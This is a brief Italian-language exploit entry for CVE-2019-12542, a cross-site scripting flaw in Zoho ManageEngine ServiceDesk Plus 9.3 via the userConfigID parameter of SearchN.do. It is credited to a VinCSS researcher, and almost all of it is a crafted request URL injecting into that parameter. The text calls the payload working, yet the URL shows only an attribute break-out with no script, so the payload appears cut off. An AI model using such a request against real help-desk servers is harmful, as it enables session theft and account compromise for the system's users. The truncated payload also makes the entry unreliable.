
Proof-of-concept per CVE-2019-12542: vulnerabilità XSS in Zoho ManageEngine ServiceDesk Plus 9.3 tramite il parametro userConfigID di SearchN.do, con payload funzionante.
Descrizione informazioni: È stato scoperto un problema in Zoho ManageEngine ServiceDesk Plus 9.3. C'è XSS tramite il parametro userConfigID di SearchN.do.
Autore: Concobe di Tarantula Team - VinCSS (membro di Vingroup)
domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=1">&selectName=Site